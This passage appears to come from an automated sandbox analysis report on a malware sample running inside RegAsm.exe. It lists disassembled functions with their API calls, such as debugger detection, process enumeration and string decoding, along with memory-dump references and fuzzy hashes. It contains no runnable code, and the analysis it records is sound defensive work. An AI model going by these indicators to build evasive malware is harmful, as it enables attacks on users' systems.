                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 69f01358d128d33b91acc77ed51355a689f7d338455a012a8a4b9effc4497dfa
                                                                                                                                                                                                • Instruction ID: 38c7d63cc03496debcdc4db3a80eb32b6021d1805d63a35497bf57b8361c38c3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f01358d128d33b91acc77ed51355a689f7d338455a012a8a4b9effc4497dfa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 92C19DB6E583415FF7008B18EC827DB7791EFC2318FA8096EE48587792F125E589C782
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5351D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B535264
                                                                                                                                                                                                • , xrefs: 1B535334
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                • API String ID: 0-69911113
                                                                                                                                                                                                • Opcode ID: 9458b3e3ceccb54066d2899d2eb923e7a79d6cfefa17b3ab530e1ad53cde6eed
                                                                                                                                                                                                • Instruction ID: e705c426d80f17a12d551d4a4d1d0dc0fae815a7f738e61e626543500514a081
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9458b3e3ceccb54066d2899d2eb923e7a79d6cfefa17b3ab530e1ad53cde6eed
                                                                                                                                                                                                • Instruction Fuzzy Hash: D7417F75900201AFEB00DF29DC80B9AB7E5FF88359F45552CF98897321D771E951CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B56D610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                                                                                                                                                                • Instruction ID: 6a56ae5d6e70a0689fbdc48badb3a0cf3a6390a21fa3e3ffd3ff7aa575df7d77
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                                                                                                                                                                • Instruction Fuzzy Hash: FD41C575600742ABEB00DF25DC81A9BBBE4FF85354F00492CF96886250E771F956CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004198D7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0041C68A
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041C69F
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041C6AA
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0041C6C6
                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0041C6CD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                • String ID: 8d
                                                                                                                                                                                                • API String ID: 2579439406-1695097073
                                                                                                                                                                                                • Opcode ID: 501579846c98b79dfdc41dbc10fd7ca710d1f1853e0c7fab06eca341cb85e236
                                                                                                                                                                                                • Instruction ID: 29083e86ca2694a7f10c409a7d679c9735fb943988e9ba888d217dedd6f199e7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 501579846c98b79dfdc41dbc10fd7ca710d1f1853e0c7fab06eca341cb85e236
                                                                                                                                                                                                • Instruction Fuzzy Hash: 782105BCA10364DFE750DF15FC89A843BA2FB1A308F50242AEA0883A71D7765981CF0D
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A4820 Relevance: 9.3, APIs: 6, Instructions: 285COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 8b2c758b08cce0e8f16afb74c9e3d2953090becedebfd64bd181cc6613b8d88f
                                                                                                                                                                                                • Instruction ID: 3229d46080d934928f91c79a4410bb199f52b4ccd68276ac0a8340d469ebb7d4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b2c758b08cce0e8f16afb74c9e3d2953090becedebfd64bd181cc6613b8d88f
                                                                                                                                                                                                • Instruction Fuzzy Hash: DBB17CB4904742ABD700CF36C885B9BB7F8BF99314F008A1DF89596680E775E598CF92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A5C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                                                                                                                                                • Instruction ID: be85914d9292e52ed3c7db91de2024766dc8ba541275e77d5d99e58d3c39953d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C4103B56043019FDB14DF24D984AA6B7E4FFA8210F10C46DE99287791E772F854CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B529090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: e5798ae4b9202250d167ed20a71de301ed6b801862d2e07e90c0f06658bbbc10
                                                                                                                                                                                                • Instruction ID: c943329365608bcef356c2e7bc4497a4951ed6b6d4969745eab991e89950e3e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: e5798ae4b9202250d167ed20a71de301ed6b801862d2e07e90c0f06658bbbc10
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E31ED75601200DFEB14CF2AD885AA6B7F5FF84365B4045BDE8428B3A2D722FC50CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040832A Relevance: 9.1, APIs: 6, Instructions: 83stringencryptionCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00408351
                                                                                                                                                                                                • lstrlenA.KERNEL32(00408656,00000001,?,00000014,00000000,00000000,?,00408656,00000014), ref: 0040836B
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(00408656,00000000,?,00408656,00000014), ref: 00408375
                                                                                                                                                                                                • memcpy.MSVCRT ref: 004083DD
                                                                                                                                                                                                • lstrcat.KERNEL32(00424BDF,00424BE3), ref: 00408404
                                                                                                                                                                                                • lstrcat.KERNEL32(00424BDF,00424BE6), ref: 0040841C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1498829745-0
                                                                                                                                                                                                • Opcode ID: b61c0110c73c517540f519dc60546777611b21f8ea2271e5b20855ac2d69eb7e
                                                                                                                                                                                                • Instruction ID: fcf93b584ce99b9c7f430d8060aaf8ed7b5880b91b5ab1036e2ccf4652505f26
                                                                                                                                                                                                • Opcode Fuzzy Hash: b61c0110c73c517540f519dc60546777611b21f8ea2271e5b20855ac2d69eb7e
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB21697590022AEBDB009F94DD44AEE7BBCEB08344F10407AF905F2251EB349A059BA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4FE200 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1138a4a1a112f6b40374673b640e377ff691bcec9c01edd2270a4c0152a97097
                                                                                                                                                                                                • Instruction ID: 362dc68dafdc6aecccb094933f6386c3870f24bd9cb3224ba381382066653950
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1138a4a1a112f6b40374673b640e377ff691bcec9c01edd2270a4c0152a97097
                                                                                                                                                                                                • Instruction Fuzzy Hash: 33113AB62053096BDB145B65AC42FEBF79CDF4C322F10442DF64552140EB76A81153A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004101A9 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004101AE
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004101D4
                                                                                                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 004101E4
                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 004101F6
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041020A
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041021D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 186290926-0
                                                                                                                                                                                                • Opcode ID: 79aa73ca13b76d23adaab92a70814fb9e70b1240514686d4e12f26ad4a329d34
                                                                                                                                                                                                • Instruction ID: aaaf54095221aa9f0fc4c5608e25412c37e27e1573ba808557da3deae7a4159d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 79aa73ca13b76d23adaab92a70814fb9e70b1240514686d4e12f26ad4a329d34
                                                                                                                                                                                                • Instruction Fuzzy Hash: D1015A75900128ABDB219F95DC48ADEBBB9EF96350F204096F505E2210D7788F81CFA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B511FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B512001
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                • API String ID: 0-914542581
                                                                                                                                                                                                • Opcode ID: 0788a8cb4300df1d73a9a8e92d31a8e1a250c74af5bdc3701dbc4dc18e2a96db
                                                                                                                                                                                                • Instruction ID: 55fc2a2e0e09cb8caf1d5032fb4e337b33ef94bfce563c1ea7e7a9c5b5757fbb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0788a8cb4300df1d73a9a8e92d31a8e1a250c74af5bdc3701dbc4dc18e2a96db
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0721CEB5900205AFFB11AF69DC81F967BEEEF58394F004558F8889B111D363F860CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B683300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,1B683688,?,00000000), ref: 1B683399
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,1B683688,?,00000000), ref: 1B6833C2
                                                                                                                                                                                                • GetACP.KERNEL32(?,?,1B683688,?,00000000), ref: 1B6833D7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
